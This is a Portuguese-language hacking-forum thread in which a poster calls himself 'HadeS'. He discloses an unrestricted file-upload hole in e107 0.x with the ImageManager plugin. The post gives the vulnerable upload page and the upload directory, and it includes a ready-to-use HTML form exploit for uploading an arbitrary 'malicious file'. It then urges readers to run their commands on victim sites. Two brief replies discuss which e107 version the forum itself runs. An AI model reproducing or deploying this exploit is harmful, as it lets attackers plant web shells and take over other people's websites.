Bug/Exploit para e107

[HadeS]

Galera, venho aqui trazer mais um Bug.

Agora se trata de uma falha no e107 que nos permitiria enviar imagens, mas podemos mandar arquivos maliciosos.

As versões 0.* estão vuls, foi testado em um e107 v0.6.14 com o ImageManager instalado.

O e107 tem uma página que nos permite enviar imagens para o servidor. A página está localizada em http://www.site_VULNERAVEL.com.br/e107_handlers/htmlarea/plugins/ImageManager/images.php e envia as imagens para http://www.site_VULNERAVEL.com.br/e107_images/ .

Acho que com essas informações já dá para vocês explorarem, mas pra quem ainda não onseguiu, aqui vai uma dica:

Code Select Expand

<html><head><title>:: Exploit e107 - HadeS : The Lord Of Underworld</title></head>
<body bgcolor="black" text="silver" link="blue" alink="blue" vlink="blue">
<b>:: Exploit para e107 - HadeS <font color="red">The Lord Of Underworld</font><br></b>
<b>::</b> Testado em um e107 v0.6.14<br><br>
Autor: <b>HadeS <font color="red">The Lord Of Underworld</font><br></b>
Site: <a href="http://www.darkers.com.br">http://www.darkers.com.br</a><br>
Site do fabricante: <a href="http://e107.org">http://e107.org</a><br><br>
<form action="http://www.SITE_VULNERAVEL.com.br/e107_handlers/htmlarea/plugins/ImageManager/images.php" enctype="multipart/form-data" method="post">
<input type="hidden" name="dir" value="Abrir..."><br>
Selecione o arquivo malicioso para ser Upado:<br>
<input type="file" name="upload" size="50"><Br>
<input type="submit" value="Enviar">
</form>
</body></html>
Agora basta selecionar o arquivo e depois rodá-lo, ele estará no seguinte diretório: http://www.site_VULNERAVEL.com.br/e107_images/.

Rode seus comandos, e boa sorte!

Façam bom proveito.

HadeS

[slul]

Qual era a versão que o pyro e o DB iam botar desse portal aki no darkers?

[Cloudy]

Deve ter sido o e107 v0.7 (O mais novo). Se não foi, tava vul.

...by Cloudy